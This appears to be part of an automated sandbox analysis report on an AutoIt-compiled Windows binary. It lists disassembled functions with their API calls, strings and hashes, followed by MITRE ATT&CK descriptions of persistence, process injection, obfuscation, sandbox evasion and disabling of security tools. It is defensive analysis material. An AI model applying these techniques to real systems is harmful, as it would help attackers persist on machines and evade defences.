Opcode Fuzzy Hash: 3219de7c11b895eeceb48be71f39202d8eaac659d97e770489edfc70346a9db5
Instruction Fuzzy Hash: 8D318B75610604AEEB109F64DC80FFB77B8FF8A364F109619F9A997190CA31AC91CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A46943, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A469D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A469DB

Strings

Combobox, xrefs: 00A4699D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2f9a709c6fe8357760782263e4fc4b8bc41dd2b41c581c22cdc5e5829eaca235
Instruction ID: 52ef3bd8ad774bfc6de1953e91ebcfc597b705419154d9f1cd1909d4c075ebd1
Opcode Fuzzy Hash: 2f9a709c6fe8357760782263e4fc4b8bc41dd2b41c581c22cdc5e5829eaca235
Instruction Fuzzy Hash: 2411EF76210108BFEF158F54DC80EFB3B2EEBCA3A4F114129F5589B192C6B29C5187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A46E76, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 009C1D35: CreateWindowExW.USER32 ref: 009C1D73
Part of subcall function 009C1D35: GetStockObject.GDI32(00000011), ref: 009C1D87
Part of subcall function 009C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 009C1D91

GetWindowRect.USER32 ref: 00A46EE0
GetSysColor.USER32(00000012), ref: 00A46EFA

Strings

static, xrefs: 00A46EBD

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 13ac217026396aeb2a45efc31bff467ebe46bd486a9081ceb3a36c1db998fcb8
Instruction ID: 37ac14059fe9ce2c3dc81a38ad4b34caaac127c1601e3e86d328bc230d18412c
Opcode Fuzzy Hash: 13ac217026396aeb2a45efc31bff467ebe46bd486a9081ceb3a36c1db998fcb8
Instruction Fuzzy Hash: E821863A62020ABFDB04DFB8DD46EFA7BB8FB89354F000629F955D2140D635A8619B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A324CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A32520
InternetSetOptionW.WININET(00000000,00000032,00000003,00000008), ref: 00A32549

Strings

<local>, xrefs: 00A32511

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: bee9f63bb504579a0fb01c594c2eb4b5d288256cf46888fa20ba96315a0d501e
Instruction ID: b4993b341cc03075971d7dd6e629412ea9aa8ff0cbc80b4f1386d463bbfe56a0
Opcode Fuzzy Hash: bee9f63bb504579a0fb01c594c2eb4b5d288256cf46888fa20ba96315a0d501e
Instruction Fuzzy Hash: 8D1102B0241225BEEB248F51CC99FFBBF6CFB06791F10812AF50542040D3356A41DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A46B8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A46C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A46C20

Strings

edit, xrefs: 00A46BF5

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 3268846e1b890af78a7515cfc9fd4e2a97f09cd8ac7ad7a02ab4487c8ce87b88
Instruction ID: 8df4708e9883576ff7073739070c44aa3157fb32fdae14b3fa31b8240201ff02
Opcode Fuzzy Hash: 3268846e1b890af78a7515cfc9fd4e2a97f09cd8ac7ad7a02ab4487c8ce87b88
Instruction Fuzzy Hash: 9A11BC79140208AFEB109FA4DC81EFB3B6DEB86378F204724F961D61E0C7719C929B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A380A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00A380C8,?,?,?,?), ref: 00A38322

inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 00A380CB
htons.WSOCK32(?,?,00000000), ref: 00A38108

Strings

255.255.255.255, xrefs: 00A380E3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 6f32f6b150dace00d8bd1c9dd1c941a715a8a3c6a19730cece6bd5522611220a
Instruction ID: 0744b2359fbe8e0c3e7303638a20fbd95dcd0079dbc1f5a9f8293214b687710f
Opcode Fuzzy Hash: 6f32f6b150dace00d8bd1c9dd1c941a715a8a3c6a19730cece6bd5522611220a
Instruction Fuzzy Hash: F811CE75200205ABDB20EFA4DC86FFEB734EF51360F20861BF5159B291CA36A455C751

Uniqueness

Uniqueness Score: -1.00%

Function 00A192E7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1B0C4: GetClassNameW.USER32 ref: 00A1B0E7

SendMessageW.USER32(?,000001A2,000000FF,00000005), ref: 00A19355

Strings

ListBox, xrefs: 00A1931F
ComboBox, xrefs: 00A192F4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 6400560350162d2105d99b259601483866b55e950ec110132ee424687256e6be
Instruction ID: a8d955c10d28c532bea29e1d223ccc81583877b70ed722046a863c68667b9821
Opcode Fuzzy Hash: 6400560350162d2105d99b259601483866b55e950ec110132ee424687256e6be
Instruction Fuzzy Hash: 5901D271A01214ABCB04EBA0CC91DFF7368FF46360B15061DF4325B2D1DB31294CC621

Uniqueness

Uniqueness Score: -1.00%

Function 00A19264, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1B0C4: GetClassNameW.USER32 ref: 00A1B0E7

SendMessageW.USER32(?,00000182,00000005,00000000), ref: 00A192D0

Strings

ListBox, xrefs: 00A1929C
ComboBox, xrefs: 00A19271

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 8a22a1389ae7085f69bc5b66270dccdc226e2eec166e496dbbc597b7d3c563f2
Instruction ID: a0239a95bbb3ad76853ef44cadfb13141159bee60d46247adaf40275b0083e49
Opcode Fuzzy Hash: 8a22a1389ae7085f69bc5b66270dccdc226e2eec166e496dbbc597b7d3c563f2
Instruction Fuzzy Hash: 8B01A272E421187ADB04E7E0DD92EFFB3ACDF16391F21401AF50563081DA226F4C9672

Uniqueness

Uniqueness Score: -1.00%

Function 00A191DF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1B0C4: GetClassNameW.USER32 ref: 00A1B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00A1924D

Strings

ListBox, xrefs: 00A19217
ComboBox, xrefs: 00A191EC

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: b6fda6088d1025e700b4161f2c9e7af80a4dcfebe57f51e51b71938d3c940401
Instruction ID: 23ff509bc1a23ea53251d36bc216e1d89efadbcf2d1f825910cf05b4b8706385
Opcode Fuzzy Hash: b6fda6088d1025e700b4161f2c9e7af80a4dcfebe57f51e51b71938d3c940401
Instruction Fuzzy Hash: 46018472E452047ADB04E7E0DD92EFFB3ACEF45340F110129B51667181EA216B4CD672

Uniqueness

Uniqueness Score: -1.00%

Function 009FB511, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 009E0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009FB540,?,?,?,009C100A), ref: 009E0B89

IsDebuggerPresent.KERNEL32(?,?,?,009C100A), ref: 009FB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009C100A), ref: 009FB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009FB54E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: cc58d9c6302c01447a8c835551040eb1335e4d1d8ae936341d72dc7ce19467de
Instruction ID: c115a19808f50b48014bad0abe837f59c96aa358a36a81f527d461db71842e89
Opcode Fuzzy Hash: cc58d9c6302c01447a8c835551040eb1335e4d1d8ae936341d72dc7ce19467de
Instruction Fuzzy Hash: 21E06DB45047148EE721DF65E8087927BE4EF40358F00892DF546C6250E7B9A045CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A181BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A181CA

Strings

Error allocating memory., xrefs: 00A181C3
AutoIt, xrefs: 00A181BE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 419d64a1c1ac0ac517985715de210ef9ae913cde18bdbe43398be930ecfcc031
Instruction ID: f70e675d6fee8423d69167d26ddddc9ff99fb77307628a4a42aa5c994999f119
Opcode Fuzzy Hash: 419d64a1c1ac0ac517985715de210ef9ae913cde18bdbe43398be930ecfcc031
Instruction Fuzzy Hash: C7D02B323C039832D21133E56C0BFC6754C4B45B13F008816BB0C555C38DE248C242D9

Uniqueness

Uniqueness Score: -1.00%

Function 00A01D5F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00A01B9F

Part of subcall function 00A3C304: LoadLibraryA.KERNEL32(kernel32.dll,?,00A01D88,?), ref: 00A3C312
Part of subcall function 00A3C304: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A3C324

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A01D97

Strings

WIN_XPe, xrefs: 00A01BB2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 22bb011b93f824b1102bbc9f3f9e14816fc34af9228fa94cf2751e502d872081
Instruction ID: 364287eeffd1a8576fff8ad879e12322603e4f7d1c12373d06e01827fef6de81
Opcode Fuzzy Hash: 22bb011b93f824b1102bbc9f3f9e14816fc34af9228fa94cf2751e502d872081
Instruction Fuzzy Hash: C0F0C2B4804109DFDB25DB94DA88AECBBF8AB49314F640099E106B60A0E7759F85DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00A01B3E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A01B42

Strings

WIN_XPe, xrefs: 00A01BB2
%.3d, xrefs: 00A01B4D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalTime
String ID: %.3d$WIN_XPe
API String ID: 481472006-2409531811
Opcode ID: 37d62d700f46f3522aa3e4d16463d7b1c1d8a57a1a75942053ecfc48cb65d985
Instruction ID: e33bdf04dd2ed0952d010b394440d5eeacbdae5d720479ad797179eeea385581
Opcode Fuzzy Hash: 37d62d700f46f3522aa3e4d16463d7b1c1d8a57a1a75942053ecfc48cb65d985
Instruction Fuzzy Hash: 90D012B5C0411CFBCB149A90EC84EF9777CA745301F504992F50692080F3759B859B21

Uniqueness

Uniqueness Score: -1.00%

Function 00A29B6D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00A29B82
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A29B99

Strings

aut, xrefs: 00A29B93

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 03a82ef02a24e8130ee1d705fcb16e44e03812947e27f3d000e83a9c882bfc2f
Instruction ID: e08b1c28422edc43f86dcd533689ae9ea39e8fa8b16344d7f59796df56dafcd7
Opcode Fuzzy Hash: 03a82ef02a24e8130ee1d705fcb16e44e03812947e27f3d000e83a9c882bfc2f
Instruction Fuzzy Hash: 0AD0177A54020DBBDB109AD0AC0EFEA772CA745701F0092A1B654910A1DAB265958BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A45BEB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A45BF5
PostMessageW.USER32 ref: 00A45C08

Part of subcall function 00A254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A2555E

Strings

Shell_TrayWnd, xrefs: 00A45BEE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 8e13ba2634634909e48b418413bd8da72d57d5e08a12d87cae5b1383115b421f
Instruction ID: 932cb3e13fb94dedf4882af30ebf5cce4d3e1c242bfe04b047e9b1d46c356bf7
Opcode Fuzzy Hash: 8e13ba2634634909e48b418413bd8da72d57d5e08a12d87cae5b1383115b421f
Instruction Fuzzy Hash: 7AD0A939388310BAE364BBB0AC0BF97AA10BB81B01F004834B209AA0D0C8E45801C200

Uniqueness

Uniqueness Score: -1.00%

Function 00A45C1F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A45C35
PostMessageW.USER32 ref: 00A45C3C

Part of subcall function 00A254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A2555E

Strings

Shell_TrayWnd, xrefs: 00A45C2E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 66da9e3753baf4d6332324b92b9fa4dce2ec26c6aff9cb05b5edf9b5c7afda48
Instruction ID: 64efb72742cd17eb4b20ad82eb2016123e96ee33ea02803acecb4765ec2b566c
Opcode Fuzzy Hash: 66da9e3753baf4d6332324b92b9fa4dce2ec26c6aff9cb05b5edf9b5c7afda48
Instruction Fuzzy Hash: 64D0A9393843107AE364BBB0AC0BF87A610BB82B01F004834B205AA0D0C8E46801C204

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
